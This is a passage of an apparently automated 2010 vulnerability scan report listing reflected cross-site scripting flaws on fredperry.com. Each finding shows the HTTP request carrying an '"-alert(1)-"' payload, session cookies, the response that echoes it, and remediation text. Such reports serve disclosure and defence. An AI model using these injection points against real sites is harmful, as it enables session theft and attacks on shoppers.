GET /customercare/information/?24020"-alert(1)-"c2e99d599f1=1 HTTP/1.1 Host: www.fredperry.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=119066206.1289339096.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ARPT=VVNKIYS192.168.100.195CKOLQ; __utma=119066206.1815755339.1289339096.1289339096.1289339096.1; __utmc=119066206; magento=u63lw0gvkztmuuz5kfxyl5pe0qoemz13; __utmb=119066206.1.10.1289339096;
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload ba55f"-alert(1)-"94d3f8d094a was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /customercareba55f"-alert(1)-"94d3f8d094a/ordertracking/ HTTP/1.1 Host: www.fredperry.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=119066206.1289339096.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ARPT=VVNKIYS192.168.100.195CKOLQ; __utma=119066206.1815755339.1289339096.1289339096.1289339096.1; __utmc=119066206; magento=u63lw0gvkztmuuz5kfxyl5pe0qoemz13; __utmb=119066206.1.10.1289339096;
Response
HTTP/1.1 404 Not Found Date: Tue, 09 Nov 2010 16:18:00 GMT Server: Apache/2.2.3 (Red Hat) X-Powered-By: PHP/5.2.14 Set-Cookie: frontend=31u97j9kf5mgjd7o8iqk5h5f92; expires=Tue, 09-Nov-2010 17:18:00 GMT; path=/; domain=www.fredperry.com Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Status: 404 File not found Connection: close Content-Type: text/html; charset=UTF-8 Content-Length: 29362
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head> <title> 404 Not ...[SNIP]... <![CDATA[ var pageTracker = _gat._getTracker("UA-10227276-1"); pageTracker._trackPageview("/customercareba55f"-alert(1)-"94d3f8d094a/ordertracking/"); //]]> ...[SNIP]...
The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload e908c"-alert(1)-"ff1f4769767 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /customercare/ordertrackinge908c"-alert(1)-"ff1f4769767/ HTTP/1.1 Host: www.fredperry.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=119066206.1289339096.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ARPT=VVNKIYS192.168.100.195CKOLQ; __utma=119066206.1815755339.1289339096.1289339096.1289339096.1; __utmc=119066206; magento=u63lw0gvkztmuuz5kfxyl5pe0qoemz13; __utmb=119066206.1.10.1289339096;
Response
HTTP/1.1 404 Not Found Date: Tue, 09 Nov 2010 16:18:24 GMT Server: Apache/2.2.3 (Red Hat) X-Powered-By: PHP/5.2.14 Set-Cookie: frontend=tqjjko9svnmmijvl6ki4ckt6l4; expires=Tue, 09-Nov-2010 17:18:24 GMT; path=/; domain=www.fredperry.com Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Status: 404 File not found Connection: close Content-Type: text/html; charset=UTF-8 Content-Length: 29362
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head> <title> 404 Not ...[SNIP]... <![CDATA[ var pageTracker = _gat._getTracker("UA-10227276-1"); pageTracker._trackPageview("/customercare/ordertrackinge908c"-alert(1)-"ff1f4769767/"); //]]> ...[SNIP]...
1.54. http://www.fredperry.com/customercare/ordertracking/ [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.fredperry.com
Path:
/customercare/ordertracking/
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload ab65d"-alert(1)-"b8038686cc was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /customercare/ordertracking/?ab65d"-alert(1)-"b8038686cc=1 HTTP/1.1 Host: www.fredperry.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=119066206.1289339096.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ARPT=VVNKIYS192.168.100.195CKOLQ; __utma=119066206.1815755339.1289339096.1289339096.1289339096.1; __utmc=119066206; magento=u63lw0gvkztmuuz5kfxyl5pe0qoemz13; __utmb=119066206.1.10.1289339096;
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head> <title> Order T ...[SNIP]... <![CDATA[ var pageTracker = _gat._getTracker("UA-10227276-1"); pageTracker._trackPageview("/customercare/ordertracking/?ab65d"-alert(1)-"b8038686cc=1"); //]]> ...[SNIP]...
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 949c8"-alert(1)-"04627fbb78f was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /customercare949c8"-alert(1)-"04627fbb78f/returns/ HTTP/1.1 Host: www.fredperry.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=119066206.1289339096.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ARPT=VVNKIYS192.168.100.195CKOLQ; __utma=119066206.1815755339.1289339096.1289339096.1289339096.1; __utmc=119066206; magento=u63lw0gvkztmuuz5kfxyl5pe0qoemz13; __utmb=119066206.1.10.1289339096;
Response
HTTP/1.1 404 Not Found Date: Tue, 09 Nov 2010 16:19:28 GMT Server: Apache/2.2.3 (Red Hat) X-Powered-By: PHP/5.2.14 Set-Cookie: frontend=vhqebjmfv1o1birdugll8iu0h4; expires=Tue, 09-Nov-2010 17:19:28 GMT; path=/; domain=www.fredperry.com Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Status: 404 File not found Connection: close Content-Type: text/html; charset=UTF-8 Content-Length: 29356
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head> <title> 404 Not ...[SNIP]... <![CDATA[ var pageTracker = _gat._getTracker("UA-10227276-1"); pageTracker._trackPageview("/customercare949c8"-alert(1)-"04627fbb78f/returns/"); //]]> ...[SNIP]...
The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 91a56"-alert(1)-"c8df448cb36 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /customercare/returns91a56"-alert(1)-"c8df448cb36/ HTTP/1.1 Host: www.fredperry.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=119066206.1289339096.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ARPT=VVNKIYS192.168.100.195CKOLQ; __utma=119066206.1815755339.1289339096.1289339096.1289339096.1; __utmc=119066206; magento=u63lw0gvkztmuuz5kfxyl5pe0qoemz13; __utmb=119066206.1.10.1289339096;
Response
HTTP/1.1 404 Not Found Date: Tue, 09 Nov 2010 16:19:46 GMT Server: Apache/2.2.3 (Red Hat) X-Powered-By: PHP/5.2.14 Set-Cookie: frontend=uj4chm4hhumhmvvm1k7503vl73; expires=Tue, 09-Nov-2010 17:19:46 GMT; path=/; domain=www.fredperry.com Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Status: 404 File not found Connection: close Content-Type: text/html; charset=UTF-8 Content-Length: 29356
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head> <title> 404 Not ...[SNIP]... <![CDATA[ var pageTracker = _gat._getTracker("UA-10227276-1"); pageTracker._trackPageview("/customercare/returns91a56"-alert(1)-"c8df448cb36/"); //]]> ...[SNIP]...
1.57. http://www.fredperry.com/customercare/returns/ [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.fredperry.com
Path:
/customercare/returns/
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 4ff83"-alert(1)-"be4f89bb799 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /customercare/returns/?4ff83"-alert(1)-"be4f89bb799=1 HTTP/1.1 Host: www.fredperry.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=119066206.1289339096.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ARPT=VVNKIYS192.168.100.195CKOLQ; __utma=119066206.1815755339.1289339096.1289339096.1289339096.1; __utmc=119066206; magento=u63lw0gvkztmuuz5kfxyl5pe0qoemz13; __utmb=119066206.1.10.1289339096;
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 8cffc"-alert(1)-"62f4b0a691c was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /footwear8cffc"-alert(1)-"62f4b0a691c/ HTTP/1.1 Host: www.fredperry.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=119066206.1289339096.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ARPT=VVNKIYS192.168.100.195CKOLQ; __utma=119066206.1815755339.1289339096.1289339096.1289339096.1; __utmc=119066206; magento=u63lw0gvkztmuuz5kfxyl5pe0qoemz13; __utmb=119066206.1.10.1289339096;
Response
HTTP/1.1 404 Not Found Date: Tue, 09 Nov 2010 16:03:21 GMT Server: Apache/2.2.3 (Red Hat) X-Powered-By: PHP/5.2.14 Set-Cookie: frontend=er03stn5g3auh22ne9eev5a085; expires=Tue, 09-Nov-2010 17:03:21 GMT; path=/; domain=www.fredperry.com Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Status: 404 File not found Connection: close Content-Type: text/html; charset=UTF-8 Content-Length: 29344
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head> <title> 404 Not ...[SNIP]... <![CDATA[ var pageTracker = _gat._getTracker("UA-10227276-1"); pageTracker._trackPageview("/footwear8cffc"-alert(1)-"62f4b0a691c/"); //]]> ...[SNIP]...
1.59. http://www.fredperry.com/footwear/ [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.fredperry.com
Path:
/footwear/
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload bfbdc"-alert(1)-"ce09f5b9080 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /footwear/?bfbdc"-alert(1)-"ce09f5b9080=1 HTTP/1.1 Host: www.fredperry.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=119066206.1289339096.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ARPT=VVNKIYS192.168.100.195CKOLQ; __utma=119066206.1815755339.1289339096.1289339096.1289339096.1; __utmc=119066206; magento=u63lw0gvkztmuuz5kfxyl5pe0qoemz13; __utmb=119066206.1.10.1289339096;
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 18143"-alert(1)-"e6c8aea808b was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /footwear18143"-alert(1)-"e6c8aea808b/men/ HTTP/1.1 Host: www.fredperry.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=119066206.1289339096.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ARPT=VVNKIYS192.168.100.195CKOLQ; __utma=119066206.1815755339.1289339096.1289339096.1289339096.1; __utmc=119066206; magento=u63lw0gvkztmuuz5kfxyl5pe0qoemz13; __utmb=119066206.1.10.1289339096;
Response
HTTP/1.1 404 Not Found Date: Tue, 09 Nov 2010 16:03:08 GMT Server: Apache/2.2.3 (Red Hat) X-Powered-By: PHP/5.2.14 Set-Cookie: frontend=huq0q65u4sj1fui2uj3fk73st0; expires=Tue, 09-Nov-2010 17:03:08 GMT; path=/; domain=www.fredperry.com Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Status: 404 File not found Connection: close Content-Type: text/html; charset=UTF-8 Content-Length: 29348
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head> <title> 404 Not ...[SNIP]... <![CDATA[ var pageTracker = _gat._getTracker("UA-10227276-1"); pageTracker._trackPageview("/footwear18143"-alert(1)-"e6c8aea808b/men/"); //]]> ...[SNIP]...
The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 5f12a"-alert(1)-"42752903dcc was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /footwear/men5f12a"-alert(1)-"42752903dcc/ HTTP/1.1 Host: www.fredperry.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=119066206.1289339096.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ARPT=VVNKIYS192.168.100.195CKOLQ; __utma=119066206.1815755339.1289339096.1289339096.1289339096.1; __utmc=119066206; magento=u63lw0gvkztmuuz5kfxyl5pe0qoemz13; __utmb=119066206.1.10.1289339096;
Response
HTTP/1.1 404 Not Found Date: Tue, 09 Nov 2010 16:03:23 GMT Server: Apache/2.2.3 (Red Hat) X-Powered-By: PHP/5.2.14 Set-Cookie: frontend=334i604v3jd1ug35amqrq6l7u1; expires=Tue, 09-Nov-2010 17:03:23 GMT; path=/; domain=www.fredperry.com Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Status: 404 File not found Connection: close Content-Type: text/html; charset=UTF-8 Content-Length: 29348
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head> <title> 404 Not ...[SNIP]... <![CDATA[ var pageTracker = _gat._getTracker("UA-10227276-1"); pageTracker._trackPageview("/footwear/men5f12a"-alert(1)-"42752903dcc/"); //]]> ...[SNIP]...
1.62. http://www.fredperry.com/footwear/men/ [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.fredperry.com
Path:
/footwear/men/
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 9db67"-alert(1)-"5e26043ec8f was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /footwear/men/?9db67"-alert(1)-"5e26043ec8f=1 HTTP/1.1 Host: www.fredperry.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=119066206.1289339096.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ARPT=VVNKIYS192.168.100.195CKOLQ; __utma=119066206.1815755339.1289339096.1289339096.1289339096.1; __utmc=119066206; magento=u63lw0gvkztmuuz5kfxyl5pe0qoemz13; __utmb=119066206.1.10.1289339096;
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 2be5b"-alert(1)-"e5744c4501f was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /footwear2be5b"-alert(1)-"e5744c4501f/women/ HTTP/1.1 Host: www.fredperry.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=119066206.1289339096.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ARPT=VVNKIYS192.168.100.195CKOLQ; __utma=119066206.1815755339.1289339096.1289339096.1289339096.1; __utmc=119066206; magento=u63lw0gvkztmuuz5kfxyl5pe0qoemz13; __utmb=119066206.1.10.1289339096;
Response
HTTP/1.1 404 Not Found Date: Tue, 09 Nov 2010 16:03:25 GMT Server: Apache/2.2.3 (Red Hat) X-Powered-By: PHP/5.2.14 Set-Cookie: frontend=96c2h4h8g79gg428a0hbandns1; expires=Tue, 09-Nov-2010 17:03:25 GMT; path=/; domain=www.fredperry.com Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Status: 404 File not found Connection: close Content-Type: text/html; charset=UTF-8 Content-Length: 29350
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head> <title> 404 Not ...[SNIP]... <![CDATA[ var pageTracker = _gat._getTracker("UA-10227276-1"); pageTracker._trackPageview("/footwear2be5b"-alert(1)-"e5744c4501f/women/"); //]]> ...[SNIP]...
The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload cd108"-alert(1)-"bc1e04530ca was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /footwear/womencd108"-alert(1)-"bc1e04530ca/ HTTP/1.1 Host: www.fredperry.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=119066206.1289339096.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ARPT=VVNKIYS192.168.100.195CKOLQ; __utma=119066206.1815755339.1289339096.1289339096.1289339096.1; __utmc=119066206; magento=u63lw0gvkztmuuz5kfxyl5pe0qoemz13; __utmb=119066206.1.10.1289339096;
Response
HTTP/1.1 404 Not Found Date: Tue, 09 Nov 2010 16:03:42 GMT Server: Apache/2.2.3 (Red Hat) X-Powered-By: PHP/5.2.14 Set-Cookie: frontend=15409u7iamhegudvk9knvhonk7; expires=Tue, 09-Nov-2010 17:03:42 GMT; path=/; domain=www.fredperry.com Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Status: 404 File not found Connection: close Content-Type: text/html; charset=UTF-8 Content-Length: 29350
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head> <title> 404 Not ...[SNIP]... <![CDATA[ var pageTracker = _gat._getTracker("UA-10227276-1"); pageTracker._trackPageview("/footwear/womencd108"-alert(1)-"bc1e04530ca/"); //]]> ...[SNIP]...
1.65. http://www.fredperry.com/footwear/women/ [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.fredperry.com
Path:
/footwear/women/
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload e0969"-alert(1)-"29b7f4c9995 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /footwear/women/?e0969"-alert(1)-"29b7f4c9995=1 HTTP/1.1 Host: www.fredperry.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=119066206.1289339096.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ARPT=VVNKIYS192.168.100.195CKOLQ; __utma=119066206.1815755339.1289339096.1289339096.1289339096.1; __utmc=119066206; magento=u63lw0gvkztmuuz5kfxyl5pe0qoemz13; __utmb=119066206.1.10.1289339096;
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 53e6b"-alert(1)-"4e4750c7287 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /heritage53e6b"-alert(1)-"4e4750c7287/ HTTP/1.1 Host: www.fredperry.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=119066206.1289339096.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ARPT=VVNKIYS192.168.100.195CKOLQ; __utma=119066206.1815755339.1289339096.1289339096.1289339096.1; __utmc=119066206; magento=u63lw0gvkztmuuz5kfxyl5pe0qoemz13; __utmb=119066206.1.10.1289339096;
Response
HTTP/1.1 404 Not Found Date: Tue, 09 Nov 2010 16:15:46 GMT Server: Apache/2.2.3 (Red Hat) X-Powered-By: PHP/5.2.14 Set-Cookie: frontend=afjfsg3q3tnjk7fmq9un82i3k1; expires=Tue, 09-Nov-2010 17:15:46 GMT; path=/; domain=www.fredperry.com Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Status: 404 File not found Connection: close Content-Type: text/html; charset=UTF-8 Content-Length: 29344
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head> <title> 404 Not ...[SNIP]... <![CDATA[ var pageTracker = _gat._getTracker("UA-10227276-1"); pageTracker._trackPageview("/heritage53e6b"-alert(1)-"4e4750c7287/"); //]]> ...[SNIP]...
1.67. http://www.fredperry.com/heritage/ [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.fredperry.com
Path:
/heritage/
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 3c544"-alert(1)-"71287e91efc was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /heritage/?3c544"-alert(1)-"71287e91efc=1 HTTP/1.1 Host: www.fredperry.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=119066206.1289339096.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ARPT=VVNKIYS192.168.100.195CKOLQ; __utma=119066206.1815755339.1289339096.1289339096.1289339096.1; __utmc=119066206; magento=u63lw0gvkztmuuz5kfxyl5pe0qoemz13; __utmb=119066206.1.10.1289339096;
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 8616c"-alert(1)-"7472e7ac244 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /home8616c"-alert(1)-"7472e7ac244/ HTTP/1.1 Host: www.fredperry.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=119066206.1289339096.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ARPT=VVNKIYS192.168.100.195CKOLQ; __utma=119066206.1815755339.1289339096.1289339096.1289339096.1; __utmc=119066206; magento=u63lw0gvkztmuuz5kfxyl5pe0qoemz13; __utmb=119066206.1.10.1289339096;
Response
HTTP/1.1 404 Not Found Date: Tue, 09 Nov 2010 16:24:48 GMT Server: Apache/2.2.3 (Red Hat) X-Powered-By: PHP/5.2.14 Set-Cookie: frontend=14d13cht96sn9sc03rpij71181; expires=Tue, 09-Nov-2010 17:24:48 GMT; path=/; domain=www.fredperry.com Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Status: 404 File not found Connection: close Content-Type: text/html; charset=UTF-8 Content-Length: 29340
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head> <title> 404 Not ...[SNIP]... <![CDATA[ var pageTracker = _gat._getTracker("UA-10227276-1"); pageTracker._trackPageview("/home8616c"-alert(1)-"7472e7ac244/"); //]]> ...[SNIP]...
1.69. http://www.fredperry.com/home/ [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.fredperry.com
Path:
/home/
Issue detail
